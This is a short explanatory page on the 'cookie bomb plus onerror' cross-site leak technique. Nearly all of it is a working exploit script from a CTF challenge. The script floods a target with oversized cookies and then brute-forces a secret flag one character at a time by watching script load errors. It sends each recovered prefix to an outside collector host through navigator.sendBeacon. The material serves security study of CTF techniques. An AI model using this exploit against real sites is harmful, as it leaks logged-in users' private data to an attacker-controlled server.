Cookie Bomb + Onerror XS Leak

[AD REMOVED]

The following script taken from here is exploiting a functionality that allows the user to insert any amount of cookies, and then loading a file as a script knowing that the true response will be larger than the false one and then. If successful, the response is a redirect with a resulting URL longer, too large to handle by the server so return an error http status code. If the search fails, nothing will happen because URL is short.

<>'";
<form action="https://sustenance.web.actf.co/s" method="POST">
  <input id="f" /><input name="search" value="a" />
</form>
<script>
  const $ = document.querySelector.bind(document)
  const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
  let i = 0
  const stuff = async (len = 3500) => {
    let name = Math.random()
    $("form").target = name
    let w = window.open("", name)
    $("#f").value = "_".repeat(len)
    $("#f").name = i++
    $("form").submit()
    await sleep(100)
  }
  const isError = async (url) => {
    return new Promise((r) => {
      let script = document.createElement("script")
      script.src = url
      script.onload = () => r(false)
      script.onerror = () => r(true)
      document.head.appendChild(script)
    })
  }
  const search = (query) => {
    return isError(
      "https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query)
    )
  }
  const alphabet =
    "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ"
  const url = "//en4u1nbmyeahu.x.pipedream.net/"
  let known = "actf{"
  window.onload = async () => {
    navigator.sendBeacon(url + "?load")
    await Promise.all([stuff(), stuff(), stuff(), stuff()])
    await stuff(1600)
    navigator.sendBeacon(url + "?go")
    while (true) {
      for (let c of alphabet) {
        let query = known + c
        if (await search(query)) {
          navigator.sendBeacon(url, query)
          known += c
          break
        }
      }
    }
  }
</script>

[AD REMOVED]